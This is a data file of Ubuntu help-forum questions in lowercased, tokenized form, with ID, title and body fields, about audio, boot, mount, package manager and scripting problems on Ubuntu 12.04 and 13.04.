300496	pulseaudio -- kill permission denied ? ( something 's using my soundcard and i do n't know what it is . )	so , a few weeks ago i was having problems with skype and pulseaudio/alsa things , so i went to this link and found a way to supposedly kill and start pulseaudio at will . so , in etc/pulse/client.conf , i added this : autospawn = no daemon-binary = /bin/true then , i removed /etc/rc2.d/s50pulseaudio it worked at first , but now a few weeks have passed and i played audio through hydrogen , presumably using pulseaudio ( it never seems to need jack ) , and now other sounds wo n't play , e.g . on chrome . well , basically , these are all the things i tried : ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > pulseaudio -- start n : [ pulseaudio ] main.c : user-configured server at { b66743961e53727ca323de3b0000001b } unix : /home/apodio/.pulse/b66743961e53727ca323de3b0000001b-runtime/native , which appears to be local . probing deeper . ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > sudo alsa force-reload [ sudo ] password for apodio : /sbin/alsa : warning : processes using sound devices : 12442 ( jackd ) . unloading alsa sound driver modules : snd-hda-codec-conexant snd-hda-codec-hdmi snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device snd-page-alloc ( failed : modules still loaded : snd-hda-codec-conexant snd-hda-codec-hdmi snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-seq snd-timer snd-seq-device snd-page-alloc ) . loading alsa sound driver modules : snd-hda-codec-conexant snd-hda-codec-hdmi snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-timer snd-seq-device snd-page-alloc . ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > pulseaudio -- kill ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > pulseaudio -- start ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > sudo pulseaudio -- start w : [ pulseaudio ] main.c : this program is not intended to be run as root ( unless -- system is specified ) . e : [ autospawn ] core-util.c : home directory /home/apodio not ours . w : [ autospawn ] lock-autospawn.c : can not access autospawn lock . e : [ pulseaudio ] main.c : failed to acquire autospawn lock ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > sudo pulseaudio -- kill e : [ pulseaudio ] core-util.c : home directory /home/apodio not ours . e : [ pulseaudio ] main.c : failed to kill daemon : permission denied ┌─ ( apodio ) - ( 3.2.0-43-generic ) - ( ~ ) └─ > sudo pulseaudio -- start w : [ pulseaudio ] main.c : this program is not intended to be run as root ( unless -- system is specified ) . e : [ autospawn ] core-util.c : home directory /home/apodio not ours . w : [ autospawn ] lock-autospawn.c : can not access autospawn lock . e : [ pulseaudio ] main.c : failed to acquire autospawn lock i think i am root , since i 'm the only user etc . i 've also added myself to the audio group in a moment of haste . ps i know it says `` processes using sound devices : 12442 ( jackd ) '' , but i just started up qjackctl and as usual it said it could n't connect , so i have a feeling it was n't actually running . but ... autospawn lock ? permission denied ? home directory not ours ? i 'm the only user on this computer ! what 's going on ? basically , since i used hydrogen , something is now using my soundcard and i do n't know what or how to stop it .
300498	ive just upgraded to ubuntu 13.04 same issue : no menu , no launcher , but no unity checkbox in ccsm	using my toshiba satellite l350d i just upgraded to ubuntu 13.04 and now dont have access to launcher or top menu bar . ive tried following the solutions both here : unity does n't load , no launcher , no dash appears when i try and activate unity plugin theres no checkbox beside it in ccsm , its the only icon in the list without a checkbox so i cant enable it.. any ideas ?
300501	how can i get my old bootloader back ?	i installed something and now i have bootloader from debian . it 's not my screenshot ! ! i have ubuntu 12.04 and windows 7 . - > ubuntu 12.04 - > ubuntu 12.04 ( recovery ) - > previous versions ... - > something with memory - > something with memory - > windows 7 when i chose ubuntu , it will freeze and i have to restart the computer . so i have to wait 2 seconds , go down to windows and then up to ubuntu and press enter . that 's working ... but it 's ... . not good ... . so , please how can i uninstall this version to get the standart grub loader ? or this ?
300509	how to replace /lib/modules in chroot ?	i have mounted my system where my modules were accidentally deleted , all of them , all of the old ones , and the most recent ones 3.2.41 . i have mounted my system and i 'm chroot and i do n't know what to do here . i found an answer on here saying to download the headers , which when i tried , it said they were already the newest version , and make a symbolic link to /lib/modules/linux-headers-pkgname/build , and it allowed me to create the link to /lib/modules/linux-headers-3.2.41/ but no further . if anyone could help me fix this , i 'm already chroot with my correct system mounted along with proc , sys , and /dev/pts , at this point i just do n't know what package to download and install , or how to place what i need back into /lib/modules . should i remove this symlink as well ? i have the 3.2.41 backed up on an external drive , can i just copy it back into the correct folder and have my modules back ? i 'm using ubuntu 32-bit 12.04 .
300511	ca n't run minecraft ... a glx problem ?	^ that . error report : time : 5/26/13 8:06 pm description : failed to start game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:52 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:684 ) at org.lwjgl.opengl.display.create ( display.java:854 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:235 ) at avv.a ( sourcefile:56 ) at net.minecraft.client.minecraft.run ( sourcefile:507 ) at java.lang.thread.run ( thread.java:722 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- system details -- details : minecraft version : 1.5.2 operating system : linux ( amd64 ) version 3.5.0-31-generic java version : 1.7.0_21 , oracle corporation java vm version : openjdk 64-bit server vm ( mixed mode ) , oracle corporation memory : 23182920 bytes ( 22 mb ) / 58785792 bytes ( 56 mb ) up to 872415232 bytes ( 832 mb ) jvm flags : 0 total ; aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used suspicious classes : no suspicious classes found . intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 lwjgl : 2.4.2 opengl : ~~error~~ nullpointerexception : null is modded : probably not . jar signature remains and client brand is untouched . type : client ( map_client.txt ) texture pack : default profiler position : n/a ( disabled ) vec3 pool size : ~~error~~ nullpointerexception : null please help ?
300513	mount error : permission denied	i 'm trying to share a folder in my windows server to my ubuntu server . and i am getting the following error when i issue the command mount -a mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) inside /etc/fstab //192.168.100.34/shared/files /home/user/files cifs guest , uid=1000 , iocharset=utf8 0 0 the folder being shared from windows has rwx set permission and the firewall is being disabled ( for now ) . the folder inside the ubuntu server is chmod 777
300516	installation issues for virtualenv and virtualenvwrapper in 13.04	ubuntu server in virtualbox . i am trying to install virtualenv to start learning flask and bottle . some details of my setup . vks @ ubsrvb : ~ $ cat /etc/os-release name= '' ubuntu '' version= '' 12.04.2 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.2 lts ) '' version_id= '' 12.04 '' vks @ ubsrvb : ~ $ python -- version python 2.7.3 vks @ ubsrvb : ~ $ echo $ virtualenvwrapper_python /usr/bin/python vks @ ubsrvb : ~ $ echo $ virtualenv_python vks @ ubsrvb : ~ $ when i boot my virtual machine , i get the following error on my console /usr/bin/python : no module named virtualenvwrapper virtualenvwrapper.sh : there was a problem running the initialization hooks . if python could not import the module virtualenvwrapper.hook_loader , check that virtualenv has been installed for virtualenvwrapper_python=/usr/bin/python and that path is set properly . when i try to initialize a virtualenv i get the following errors vks @ ubsrvb : ~/dropbox/venv $ virtualenv try1 new python executable in try1/bin/python3.2 also creating executable in try1/bin/python traceback ( most recent call last ) : file `` /usr/local/bin/virtualenv '' , line 9 , in < module > load_entry_point ( 'virtualenv==1.9.1 ' , 'console_scripts ' , 'virtualenv ' ) ( ) file `` /usr/local/lib/python3.2/dist-packages/virtualenv.py '' , line 979 , in main no_pip=options.no_pip ) file `` /usr/local/lib/python3.2/dist-packages/virtualenv.py '' , line 1081 , in create_environment site_packages=site_packages , clear=clear ) ) file `` /usr/local/lib/python3.2/dist-packages/virtualenv.py '' , line 1499 , in install_python os.symlink ( py_executable_base , full_pth ) oserror : [ errno 30 ] read-only file system vks @ ubsrvb : ~/dropbox/venv $ ls try1 vks @ ubsrvb : ~/dropbox/venv $ ls try1/ bin include lib vks @ ubsrvb : ~/dropbox/venv $ my .bashrc entries export workon_home='~/dropbox/venv/' source '/usr/local/bin/virtualenvwrapper.sh' q1 - as per the error at bootup , how do i ensure virtualenv is installed for virtualenvwrapper_python=/usr/bin/python and that path is set properly ? q2 - even with sudo i get the same `` read-only file system '' error ? i have tried installing virtualenv using pip and then apt-get , just to hit and try .
300517	how to get rid of lohit hindi and set a different default font in right to left complex script	i use multiple languages with libreoffice . i have genome ubuntu 12.04 installed . when i change the keyboard layout from english to pashto or persian the standard font is changed to lohit hindi . this font does not support many of the characters in pashto and/or has problems with some the characters . how do i change the settings so that when when i press ( alt+shift ) to change the keyboard layout the font changes to a pre-specified font like bahij nassim or arial rather than lohit hindi .
300519	having trouble mounting cds ( even music cds ) - ubuntu 10.04	seems like my cd reader is bricked . this is bizarre , since `` eject '' and `` wodim '' ( or the gui equivallent ) function : i am able to eject a cd and i am able to burn a cd-r - ca n't check though as it does not read any cd . > sudo mount /dev/cdrom /media/cdrom mount : block device /dev/sr0 is write-protected , mounting read-only mount : you must specify the filesystem type > sudo mount /dev/cdrom /media/cdrom -o ro -t iso9660 mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error ( could this be the ide device where you in fact use ide-scsi so that sr0 or sda or so is needed ? ) in some cases useful info is found in syslog - try dmesg | tail or so > dmesg sr 1:0:0:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense sr 1:0:0:0 : [ sr0 ] sense key : illegal request [ current ] sr 1:0:0:0 : [ sr0 ] add . sense : logical block address out of range sr 1:0:0:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 01 00 end_request : i/o error , dev sr0 , sector 0 sr 1:0:0:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense sr 1:0:0:0 : [ sr0 ] sense key : illegal request [ current ] sr 1:0:0:0 : [ sr0 ] add . sense : logical block address out of range sr 1:0:0:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 00 00 10 00 00 01 00 end_request : i/o error , dev sr0 , sector 64 isofs_fill_super : bread failed , dev=sr0 , iso_blknum=16 , block=16 i am certain the filesystem is iso9660 ( i have an iso copy of this cd as a file and i can mount it as a loop device ) . i tried to mount an audio cd , it yields the same errors ( same with vlc ) . i do n't understand what 's up with my system . any way i can diagnose the problem ? fix it ? anybody sow similar behaviour before ? i would love to hear from you .
300524	auto hide launcher left a broken line there	i find that the launcher is quite annoying , so i choose to auto hide it . i have installed compizconfig , how the problem is still there . the lanucher will hide but it left a column there , if i changed to fade instead of slide , that 's a bit better , it left a line there only , but that still annoys me , so i would like to know how to fix it ?
300529	does any one can help to sharing a file wirelessly	i want to share a 1 gb file from linux ubuntu 12.10 desktop version which extension is .avi and i shared it via a wireless router by the name of tp-link , speed 450 mbps through samba and appache2 but i cant play the shared file more then 2 computer simultaneously and i want to share this file which is capable to play at least 10 computer simultaneously at the same time . thanks in advance .
300530	how do you make a copy of wine to a dvd ?	i am trying to make a copy of wine to a dvd so that i can put it on my laptop . does anyone know how to do this ?
300532	how to save in specific folder a pdf from print file	i have a strange behaviour while printing to pdf . i am not very sure when it started to do but i got it on several computers with 12.10 and 13.04 flavors . when i print to pdf file in a different folder than the default home , by selecting the folder 'save in folder ' of the print dialog box , whatever which folder i select , the save is always made in my home folder . is this a bug or am i doing something wrong ? in the first case if anyone could confirm it here , i would be more confident for filling a bug report , in second case anybody could point me how to do would be great ! tks for help
300533	preparing to replace install-info 4.13a.dfsg.1-10ubuntu4 ( using ... /install-info_5.1.dfsg.1-3_i386.deb )	when i upgraded my system , i had a problem about this syntax : preparing to replace install-info 4.13a.dfsg.1-10ubuntu4 ( using ... /install-info_5.1.dfsg.1-3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/install-info_5.1.dfsg.1-3_i386.deb ( -- unpack ) : triggers ci file contains unknown directive `interest-noawait' errors were encountered while processing : /var/cache/apt/archives/install-info_5.1.dfsg.1-3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anybody help me with this problem ?
300537	how to edit or add content to the postgres-xc.prerm file ?	i tried to remove postgres-xc . but , i am getting an error like the following : errors were encountered while processing : postgres-xc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so , i searched google to resolve this problem and found the following solution : modify postgres-xc.prerm : add `` exit 0 '' after first line ( # /bin/sh -e ) then remove normally : sudo apt-get remove postgres-xc but , i am unable able to edit or add content to postgres-xc.prerm file in ubuntu12.10 how can i resolve this ?
300539	access the usb drive from which ubuntu boots	how can i access the files stored on the usb drive from which ubuntu boots ? ( using ubuntu 12.10 )
300541	installation problems ubuntu 13.04 and or 12.04	can not get 12.04.2 lts or 13.04 to install passed the `` prepare to install ubuntu '' step . screen goes black thin fills up with `` [ 4248.028011 ] '' followed by numerous groups of numbers and letters ... hp pavilion zv6000 with 2gb ram
300542	liblapack.so file	i want to run a matlab code in ubuntu 12.04 in which error is coming that liblapack.so shared library file is missing . how to get this file installed and from where can i get this file.please help me please its urgent .
300543	after sudo apt-get install -f i will get the error as in the body part ?	errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
300547	how to check the working condition of my webcam	cheese web cam booth is showing `` no divice found '' . i have to understand - is the program is at fault or web cam itself .
300548	will formatting the windows system partition uninstall ubuntu ?	i want to format my windows 7 partition but do n't want to remove ubuntu . is this possible ?
300550	flux on 13.04 unable to set preferences	i installed flux from the kilian ppa , which installs fine . i run the app and the icon displays in the tray . however , when i try to set my preferences , the menu does not ever appear . i found the flux log in /tmp and am hoping someone here can decipher it for me traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py '' , line 381 , in < module > app = fluxgui ( ) file `` /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py '' , line 22 , in __init__ self.settings.zipcode , self.settings.color ) file `` /usr/lib/pymodules/python2.7/fluxgui/fluxgui.py '' , line 48 , in start_xflux self.xflux = pexpect.spawn ( `` /usr/bin/xflux '' , args ) file `` /usr/lib/python2.7/dist-packages/pexpect.py '' , line 430 , in __init__ self._spawn ( command , args ) file `` /usr/lib/python2.7/dist-packages/pexpect.py '' , line 560 , in _spawn os.execv ( self.command , self.args ) oserror : [ errno 2 ] no such file or directory
300557	how to restore the default chown permissions on a directory / file ?	i am using ubuntu 13.04 x86_64 . i wanted to own whole stuff in my home directory . so i executed these two commands . sudo chown -rch rootkea ~ sudo chown -rcl rootkea ~ now due to those symbolic links linked to some other files in filesystem i have accidentally owned files which reside outside of my home directory . the immediate consequences which i noticed are : sudo not working $ sudo sudo : effective uid is not 0 , is sudo installed setuid root ? system has become so slow . it just gets hanged when i click on shutdown / reboot . each time i have to manually power off the machine . creates a log file /var/log/cups/error_log of indefinite size which consumes the last byte of my hard drive ( after considerable time ) . last time it was 17.8 gb ! the content of the file was only these two lines repeated uncountably : e [ 24/may/2013:02:27:52 +0530 ] file `` /usr/lib/cups/notifier/dbus '' has insecure permissions ( 0100755/uid=1000/gid=0 ) . w [ 24/may/2013:02:27:52 +0530 ] notifier for subscription 531 ( dbus : // ) went away , retrying ! so clearly cups program is screwed too . now i have no idea about how many other programs have gone to unusable state . is there any way to undo the effects of above mentioned two commands ? how can i restore the default permission settings to whole filesystem ?
300561	hp dv6 7040tx overheating issue	as the title says , my laptop is a hp dv6 7040tx which has the following dual graphics cards : 1.intel 4000 2.nvidia 630m i went through some sites and found that both my graphics card are being used . so , it was recommended for me to install bumblebee . i installed it and i used optirun to run my games . but , now my laptop is heating up ! i was copying files over lan and i 'm downloading torrent files . there is not much cpu usage . it stays at around 5 % . but , the sensor values read as follows : acpitz-virtual-0 adapter : virtual device temp1 : +86.0°c temp2 : +86.0°c ( crit = +120.0°c ) temp3 : +30.0°c ( crit = +120.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +86.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +86.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +86.0°c ( high = +87.0°c , crit = +105.0°c ) core 2 : +81.0°c ( high = +87.0°c , crit = +105.0°c ) core 3 : +81.0°c ( high = +87.0°c , crit = +105.0°c ) is there a s/w to control this or should i do something else ?
300563	if statement in c is n't evaluating the conditions	ok , so i 'm new to ubuntu and linux os . so far i 'm loving it , specially the cli . i also like programming but i 'm a self learner , pretty new in this too . i wrote a small program using vim and compiled it using gcc . no problems there , but when i run the executable file , the output is n't what i expected the program to do , the if statement does n't evaluate the conditions and it prints all the options as if they were all true . here 's the code and the result : # include < stdio.h > int main ( ) { int num1 ; int num2 ; printf ( `` relations between two numbers.\n '' ) ; printf ( `` please , enter two numbers , separated by a space : `` ) ; scanf ( `` % d % d '' , & num1 , & num2 ) ; if ( num1 == num2 ) ; { printf ( `` % d is equal than % d\n '' , num1 , num2 ) ; } if ( num1 ! = num2 ) ; { printf ( `` % d is different than % d\n '' , num1 , num2 ) ; } if ( num1 < num2 ) ; { printf ( `` % d is less than % d\n '' , num1 , num2 ) ; } if ( num1 > num2 ) ; { printf ( `` % d is greater than % d\n '' , num1 , num2 ) ; } if ( num1 < = num2 ) ; { printf ( `` % d is less or equal than % d\n '' , num1 , num2 ) ; } if ( num1 > = num2 ) ; { printf ( `` % d is greater or equal than % d\n '' , num1 , num2 ) ; } return 0 ; } when i run it , i get the following : relations between two numbers . please , enter two numbers , separated by a space : 34 45 34 is equal than 45 34 is different than 45 34 is less than 45 34 is greater than 45 34 is less or equal than 45 34 is greater or equal than 45 as you can see , it printed out all the conditions , without evaluating them . when i try the same code , in a windows os using dev c++ ( which also uses gcc ) , it runs perfectly . so , what am i doing wrong ? i can write all my programs in windows but what i really want is to become an ubuntu user and get rid of microsoft for good ; ) any help would be greatly appreciated , thanks in advance ! !
300564	netbeans install error : the specified jdk folder does not contain jdk	during installation of netbeans 7.3 i got this message the specified jdk folder does not contain jdk i have openjdk 7 installed on my system using apt-get . i tried to specify the path to /usr/lib/jvm/java-7-openjdk-i386 and also tried to /usr/lib/jvm/java-7-openjdk-i386/bin but nothing works . what should i do ?
300584	touchpad scrolling not working , all set correctly in dconf editor , acer aspire v3 771g , ubuntu 13.04	i 've been through all the other similar posts i can find on this , and they suggest creating/editing files that seem to make no difference , sorry . i have a new computer ( acer aspire v3 771g ) running ubuntu 13.04 , but touchpad scrolling wo n't work . i 've tried enabling everything touchpad related in the dconf editor , and even installed the unity tweak tool and bodged settings around in there , but nothing seems to work . can anyone offer me any advice as to what i should try next ? thanks , doug .
300585	ubuntu server changing monitor from dvi to vga	i have a little problem with my ubuntu server 12.04 . i installed it yesterday with a dvi monitor connected . with the dvi monitor , everything works fine . but when i try to connect it with an other monitor over vga , nothing will be displayed and the server seems to stop at boot ( ca n't connect over ssh ) . i searched the web already but i ca n't find a solution for my problem . so my question is : is there a possibility to change the main video output to vga ? my videocard : nvidia 9800gt
300586	detecting if folder exists and renaming by pattern	me again with another command-line script question : ) i made a helper script that looks like this echo 'target.bak - > target.old_bak' mv target.bak target.old_bak echo 'target - > target.bak' mv target target.bak echo 'git clone : target - > target' git clone ssh : //shark @ mcs15:29418/our-trunk-target target cd target echo 'managing hooks ... ' scp -p -p 29418 shark @ mcs15 : /hooks/commit-msg .git/hooks/ echo ' ... done . enjoy the new clone while it lasts ... ' this is pretty basic but it gets my point across - it keeps the last two clones and makes a new one , i need to retain my latest clone in the target folder because i symlinked my source folder in my eclipse project to point there : d i would like to make an improvement to this script - instead of renaming target.bak - > target.old_bak and target - > target.bak i would like the following to happen : if bakn exists then rename bakn - > bak ( n+1 ) rename recursivelly bak ( n-1 ) - > bakn rename target to target.bak clone new repo into target so in case i had gone through 6 clones and i 'm cloning for the seventh time i 'd like this to happen : target.bak4 - > target.bak5 target.bak3 - > target.bak4 target.bak2 - > target.bak3 target.bak1 - > target.bak2 target.bak0 - > target.bak1 target - > target.bak0 cloning into 'target ' ... this community helped me immensely with my previous mass-diffing question so i hope you will be helpful enough to provide me with a decent way to do this one as well : ) edit : the finalized script looks like this , thanks wolfie for your major contributions . # ! /bin/bash myuser= '' shark '' trunk_folder= '' target-on-trunk '' target_folder= '' target '' if [ -n `` `ls -1d -v $ { target_folder } .bak ? ` '' ] ; then echo `` pushing back numbered backups ... '' maxbck=`ls -1d $ { target_folder } .bak* 2 > /dev/null | egrep -o `` [ 0-9 ] + $ '' | sort -n | tail -n1` if [ `` $ maxbck '' ! = `` '' ] ; then for ( ( c= $ maxbck ; c > =0 ; c -- ) ) do mv -v $ { target_folder } .bak $ c $ { target_folder } .bak $ ( ( $ c+1 ) ) done fi fi if [ -e `` $ target_folder.bak '' ] ; then mv -v $ { target_folder } .bak $ { target_folder } .bak0 fi if [ -e `` $ target_folder '' ] ; then mv -v $ { target_folder } $ { target_folder } .bak fi echo `` git clone : $ { trunk_folder } - > $ { target_folder } '' git clone ssh : // $ { myuser } @ mcs15:29418/ $ { trunk_folder } $ { target_folder } cd $ { target_folder } echo 'managing hooks ... ' scp -p -p 29418 $ { myuser } @ mcs15 : /hooks/commit-msg .git/hooks/ echo ' ... done . enjoy the new clone while it lasts ... '
300590	my package manager is broken , index files are missing	i 've a problem with package-manager in my ubuntu 12.04 . i 've read some answer and i find this possible solution : sudo apt-get autoremove & & sudo apt-get autoclean sudo apt-get update & & sudo apt-get -y upgrade -- fix-missing i 've try the solution proposed and i obtain this error message : ( the message is in italian but i put english translation in [ ] ) errore gpg : http : / /it.archive.ubuntu.com precise release : le seguenti firme non erano valide [ the sequent signs are not valid ] : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : impossibile recuperare [ impossible to recover ] http : / /it.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/index nessuna voce hash nel file release [ anyone hash element in file release ] /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_index w : impossibile recuperare [ impossible to recover ] http : / /it.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/index nessuna voce hash nel file release [ anyone hash element in file release ] /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_index w : impossibile recuperare [ impossible to recover ] http : / /it.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/index nessuna voce hash nel file release [ anyone hash element in file release ] /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_index w : impossibile recuperare [ impossible to recover ] http : / /it.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/index nessuna voce hash nel file release [ anyone hash element in file release ] /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_index e : impossibile scaricare alcuni file di indice : saranno ignorati o verranno usati quelli vecchi . [ is impossible download some index file : they will be ignored or will be used the old ones . ] > > i'do n't understand how resolve this problem anyone can help me ?
300592	configuration is not saving after reboot	i have ubuntu 13.04 13.4 driver version . monitor and tv , both with fullhd resolution . monitor on dvi , tv on hdmi . i use `` sudo amdcccle '' to configure `` extended displays '' mode , but after reboot there is no signal on tv , so i must visit `` sudo amdcccle '' again . p.s . i ca n't start ccc withput using terminal , it 's just ignores me .
300593	accidentally removed `` ubuntu one '' folder	to keep it simply : i 've deleted `` ubuntu one '' folder now i do n't have it all over devices and now idea how bring it back so it will be sync again . data recovery is n't important , data was random . but functionality is key feature here . can i fix it with u1sdtool or with webbrowser panel ?
300595	how to switch keyboard input language through ssh terminal on the remote machine ? ( alt-shift analog for ssh )	i 'm looking for a way to change the language i give as input to the remote machine in an ssh session . all i want is an analog of the alt+shift shortcut , but for the remote machine . specifically , the language i want to use is greek . i do n't want permanent change , i just want to be able to change it repeatedly whenever i want . i 've installed the locale packages for greek ( el- ... ) but it seems changing the language of the local keyboard does not help with the remote machine 's language . e.g . i switch to greek on the local computer , and i write - touch [ greek characters ' filename ] in the command line , but then the file appears as ? ? ? , so there 's something wrong . i do n't know if it makes any difference , but i connect to the remote ( ubuntu ) machine through putty in windows os , and that 's where i mainly intend to do so .
300602	why am i getting these errors after running sudo apt-get -f install ?	sudarshan @ sudarshan-dl-h61mxp : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libreoffice-common suggested packages : libreoffice-style-crystal libreoffice-style-hicontrast libreoffice-style-human libreoffice-style-oxygen libreoffice-style-tango the following new packages will be installed : libreoffice-common 0 upgraded , 1 newly installed , 0 to remove and 22 not upgraded . 10 not fully installed or removed . need to get 0 b/11.1 mb of archives . after this operation , 65.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 276873 files and directories currently installed . ) unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice.org-debian-menus 3.4-9593 rmdir : failed to remove ‘/var/lib/libreoffice/share/prereg/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice/share/’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice/program/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for gnome-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
300603	bash refuses to execute correct binary	i 've installed the current version of texlive ( 2012 ) , which installs its binaries into /usr/local/texlive/2011/bin/i386-linux/ . i subsequently added this directory to the path variable by modifying the /etc/environment file , since i want this installed for all users : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/texlive/2012/bin/i386-linux '' i then proceeded to remove the texlive apt-suite packages , since i was getting errors when trying to compile .tex documents that showed me a texlive 2009 distribution came prepackaged with my lubuntu 12.04 . now something pretty strange happens : ~ which pdflatex /usr/local/texlive/2012/bin/i386-linux/pdflatex so it seems the binary is being found . still , the following happens : ~ pdflatex foo.tex /usr/bin/pdflatex : file not found ! why is it looking ăźn /usr/bin/ ? is this some kind of bash internal cache for binary locations ( i vaguely remember hearing something about this ) ? what would be a possible fix ?
300604	how to dynamically generate pdf documents	i want to build a web application for generating stylish pdf documents . the layout should be based on a design templates and the data should come dynamically from the database . ideally i want to design the template in a `` publishing like '' tool with placeholders and replace these placeholders by the web application with the data from the database . think of something like an invoice generator , where a customer could choose from different invoice templates and the invoice data itself coming from the db . thanks for your ideas !
300606	ubuntu 12.04 lts 64-bit hangs after boot	i recently installed a fresh ubuntu 12.04 lts 64-bit version on my pc , first i tried to install it from cd , but it hanged after minutes , then i tried it from a usb thumb drive the same problem , then i installed it using wubi from windows 8 32-bit pro it installed normally but whenever i boot , it hangs after two minutes , everything stops working but the mouse and the keyboard are working normally . my pc specs are : mb : gigabyte g41 cpu : inteltm core 2 duo hdd : 320 gb wd gpu : nvidia gt 630
300609	ubuntu on tablets : installing software without the store ?	when ubuntu is run on a tablet , will it be possible to install software directly , i.e . without going through your store or will installation of third party be locked down to the store like with apples ipad ?
300611	how to completely remove cuda toolkit/driver from ubuntu 12.04	i am on a ubuntu 12.04 32bit . i have installed cuda driver and toolkit , and now i want to remove them . i have installed manually so they does not appear in synaptic/apt . i have removed the driver from `` additional driver '' . well , they are inactive but still in the list . how to completely remove them ? then , i have the toolkit in /usr/local/cuda , how to remove it completely and safely ? i do n't think that rm -r /usr/local/cuda is the right way.. some advice
300612	no sound in lenovo g580 with ubuntu 13.04	i was using ubuntu 13.04 in my lenovo g580 . from last 4 days my system lost sound out put . in sount setting it is showing , output through `` dummy output '' . please give me a solution
300615	phpstorm hotkeys in xubuntu	i have installed xubuntu 13.04 and phpstorm 6.x . but dont work hotkeys ( not all ) . dont work ctrl + a , ctrl + x , ctrl + v help me !
300617	is it possible to close vlc to system tray ?	i have recently installed vlc remote in my phone and i ca n't use it unless vlc is opened so i was wondering if it is possible to always keep vlc opened like skype and utorrent in windows , thanks in advance ,
300618	gnome fallback/classic - just a bottom panel	i 'm moving from opensuse to ubuntu and i decided to install 12.04 , but i do n't like unity so i 'm going to install gnome fallback , but i 'd like to have only a bottom panel , like the following image : any easy way to do so would be appreciated . regards from a newbie d :
300620	compiled program ?	i have no experience about compiling a program and i always used ppa , powertop-2.3 is not listed in any ppa , so i have compiled and installed powertop-2.3 how do i make powertop changes permanent ? . i have few question about compiled program , what if new version of powertop is out . do i need to uninstall the old one and install new version ( compile ) ? is there any way i can upgrade compiled program ?
300621	need to change the text in a lot of files at once	i have migrated over web and db files from one server to another and need to change the text in a lot of php files from the ip of the old server to 'localhost ' where the databases can now be found . what is the easiest way of making the change in all the files at the same time ? the alternative is manually editing 8 a4 pages of file names . : - (
